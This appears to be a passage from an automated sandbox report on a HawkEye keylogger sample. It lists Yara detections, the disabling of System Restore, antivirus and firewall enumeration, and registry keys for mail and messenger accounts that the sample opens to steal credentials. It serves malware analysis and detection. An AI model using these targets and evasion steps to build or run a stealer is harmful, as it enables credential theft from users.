                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    barindex
                    Disables Windows system restoreShow sources
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSR
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: taskhost.exe, 00000005.00000002.321548245.00000000010D4000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected MailPassViewShow sources
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.a1fa72.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3b67e00.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3b67e00.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3b67e00.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.42e7ae.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.72e7ae.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.72e7ae.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.40b7e00.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3b67e00.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3b67e00.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.40b7e00.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.taskhost.exe.7421c02.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3b67e00.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.a1fa72.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.283523438.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.293259909.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskhost.exe PID: 4548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: iExplorer.exe PID: 1352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5204, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6912, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskhost.exe PID: 4548, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Tries to steal Mail credentials (via file access)Show sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Yara detected WebBrowserPassView password recovery toolShow sources
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d8949.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.40d0240.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d8949.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.40d0240.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.40b7e00.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d8949.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c9c0d.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c9c0d.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.286698882.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Tries to steal Instant Messenger accounts or passwordsShow sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

                    Remote Access Functionality:

                    barindex
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskhost.exe PID: 4548, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Detected HawkEye RatShow sources
                    Source: taskhost.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                    Source: taskhost.exeString found in binary or memory: HawkEyeKeylogger
                    Source: taskhost.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                    Source: taskhost.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: taskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpString found in binary or memory: ar'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: taskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpString found in binary or memory: ar#"HawkEye_Keylogger_Stealer_Records_
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05290A8E listen,5_2_05290A8E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05290E9E bind,5_2_05290E9E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05290E6B bind,5_2_05290E6B
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05290A50 listen,5_2_05290A50
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_04FD0FC6 bind,7_2_04FD0FC6
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_04FD0A8E listen,7_2_04FD0A8E
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_04FD0F93 bind,7_2_04FD0F93
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_04FD0A50 listen,7_2_04FD0A50
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E00A8E listen,8_2_04E00A8E
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E00FC6 bind,8_2_04E00FC6
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E00A50 listen,8_2_04E00A50
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E00F93 bind,8_2_04E00F93

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Replication Through Removable Media1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11Input Capture21Peripheral Device Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
